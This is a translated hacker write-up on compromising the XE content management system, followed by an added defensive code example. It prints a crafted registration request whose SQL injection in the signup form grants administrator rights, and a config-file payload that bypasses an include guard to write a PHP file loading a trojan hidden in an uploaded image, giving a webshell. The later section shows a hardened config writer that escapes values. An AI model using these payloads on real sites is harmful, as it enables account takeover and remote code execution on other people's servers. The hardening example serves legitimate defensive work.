During a security check I came across the XE program and found that it is a common CMS in South Korea, so I set out to find a vulnerability in it. Unfortunately a scan turned up nothing usable, so I had to turn to Google for help. The injection had been published by a South Korean hacker group; the article was not in Korean and was very brief, and the only useful parts were the vulnerable file and a code snippet...
So I went back to the CMS and read through it, and dug out an INSERT-type injection...
The problem lies in /xe/classes/db/DBMysql.class.php. I won't explain the details here; after all, I didn't discover it myself.
Modified POST sent on registration:
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<params>
<_filter><![CDATA[signup]]></_filter>
<user_id><![CDATA[wood11]]></user_id>
<password><![CDATA[wooden]]></password>
<password2><![CDATA[wooden]]></password2>
<user_name><![CDATA[wooden]]></user_name>
<nick_name><![CDATA[wood]]></nick_name>
<email_address><![CDATA[wooden@www.com]]></email_address>
<find_account_question><![CDATA[, 24) #]]></find_account_question>
<find_account_answer><![CDATA[test]]></find_account_answer>
<birthday><![CDATA[2, 20110712]]></birthday>
<allow_mailing><![CDATA[Y]]></allow_mailing>
<module><![CDATA[member]]></module>
<act><![CDATA[procMemberInsert]]></act>
</params>
</methodCall>
After submitting this, the new account is given administrator privileges... Now let's talk about getting a shell.
Since the Korean article did not mention a shell, after studying it together with amote I finally got one...
In the backend Settings there is a module for submitting FTP information, and it writes the file files/config/ftp.config.php. You would think that writing a one-line shell into it would finish the job. At first I thought so too, but look at the code it writes:
<?php if(!defined("__ZBXE__")) exit();
$ftp_info->ftp_user = 'as';
$ftp_info->ftp_port = 'asd';
$ftp_info->ftp_host = 'asd';
$ftp_info->ftp_pasv = 'y';
$ftp_info->ftp_root_path = 'ss'
?>
The key is the guard at the start, if(!defined("__ZBXE__")) exit();. Obviously, if you access the file directly, the program exits at once no matter what you submitted. That broke the idea, so I kept reading through the code.
This guard is found in most configuration files, and the way past it is to find the host page that includes the file, that is, the main file that defines the __ZBXE__ constant, and have it include ftp.config.php; then the code can execute...
After going through a lot of code I finally found the host: index.php. The admin module, reached via index.php?module=admin&act=dispAdminConfig, includes the file. So you only need to call this action; __ZBXE__ is then already defined when ftp.config.php is included, and the inserted statement runs naturally.
However, don't get too happy. When you try to insert a one-liner you find that the program filters out many special symbols such as $, &, and @, so a trojan like <?php eval($_POST[c])?> that uses such characters cannot be inserted, and with gpc enabled ' is also escaped.
The following conditions must be met:
The inserted code cannot contain special symbols such as $, &, and @.
It cannot use ' (ps: gpc is enabled).
Because the file is PHP code, the payload must open and close PHP properly at both ends and must not cause a parse error in the file.
OK. After studying it, inserting a normal trojan is impossible. So let's just give the final code:
ss\'; define("__ZBXE__", "Hello world!");?><?php fputs(fopen("Wooden.php", "w"), "<? include \"files/attach/images/55520/491/092/dd084814f98d139fa5aae08414b75ea4.gif\";?>")?><?//;
Note that the \' at the beginning gets turned into \\', because the \' we submit is escaped again by gpc being on; otherwise, if the statement is submitted as-is, the program reports an error (I won't explain the principle here). Once the statement is called, a Wooden.php is generated in the root directory. Before that, you must enable file upload in the backend and upload an image file containing a PHP trojan, then put the trojan's path into the include. Note that double quotes must be used because of gpc, but doubly nested double quotes cause an error, so the double quotes inside the include must be escaped.
OK. After submission, visit Wooden.php, which includes the local webshell.
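The root cause of the shell part above is that ftp.config.php is assembled by pasting submitted values between single quotes, which a blacklist of $, &, @ and gpc escaping cannot make safe. The following is an added example and not XE's own code: a hardened writer for the same file that validates each field by its type and emits the values with var_export(), so a value shaped like the payload above is stored as inert string data (the function names and validation rules are this example's assumptions).

```php
<?php
// Added example, not XE's code; names and validation rules are assumptions.

// The weak pattern from the write-up: a ' in any value ends the literal.
function render_ftp_config_unsafe(array $in): string
{
    $php = "<?php if(!defined(\"__ZBXE__\")) exit();\n";
    foreach (['ftp_user', 'ftp_port', 'ftp_host', 'ftp_pasv', 'ftp_root_path'] as $k) {
        $php .= "\$ftp_info->$k = '" . ($in[$k] ?? '') . "';\n";
    }
    return $php . "?>";
}

// Hardened: validate each field by what it is, then encode with var_export().
function render_ftp_config_safe(array $in): string
{
    $host = (string) ($in['ftp_host'] ?? '');
    if (!filter_var($host, FILTER_VALIDATE_IP)
        && !preg_match('/^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$/', $host)) {
        throw new InvalidArgumentException('ftp_host must be an IP or hostname');
    }
    $port = filter_var($in['ftp_port'] ?? '', FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 65535]]);
    if ($port === false) { throw new InvalidArgumentException('ftp_port must be 1-65535'); }
    $pasv = (($in['ftp_pasv'] ?? 'N') === 'Y') ? 'Y' : 'N';
    // Free-text fields: reject only control bytes and over-long values. No
    // blacklist of $, &, @ or ' is needed; quoting is var_export()'s job.
    $text = [];
    foreach (['ftp_user', 'ftp_root_path'] as $k) {
        $v = (string) ($in[$k] ?? '');
        if (strlen($v) > 255 || preg_match('/[\x00-\x1f\x7f]/', $v)) {
            throw new InvalidArgumentException("$k has control bytes or is too long");
        }
        $text[$k] = $v;
    }
    $values = ['ftp_user' => $text['ftp_user'], 'ftp_port' => $port, 'ftp_host' => $host,
               'ftp_pasv' => $pasv, 'ftp_root_path' => $text['ftp_root_path']];
    $php = "<?php\nif (!defined('__ZBXE__')) exit();\n";
    foreach ($values as $k => $v) {
        // var_export() escapes \ and '; "?>" inside a string literal never leaves PHP mode.
        $php .= "\$ftp_info->$k = " . var_export($v, true) . ";\n";
    }
    return $php; // no trailing ?>: nothing after it can be executed or echoed
}

// Constructed input shaped like the write-up's payload; in the safe output it is one quoted string.
$demo = ['ftp_user' => 'as', 'ftp_port' => '21', 'ftp_host' => 'ftp.example.com',
         'ftp_pasv' => 'Y', 'ftp_root_path' => "ss\\'; define('__ZBXE__', 1);?><?php echo 1;?><?//;"];
echo render_ftp_config_safe($demo);
```

Running it prints a config whose ftp_root_path line is a single escaped literal, and the same input passed to render_ftp_config_unsafe() shows the broken-out code the write-up relies on, which is the check to run against any installation that still writes config files by string concatenation.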
That is the end of the article. I have to admit the process was rather tortuous, mainly in the structural aspects.
By: Stay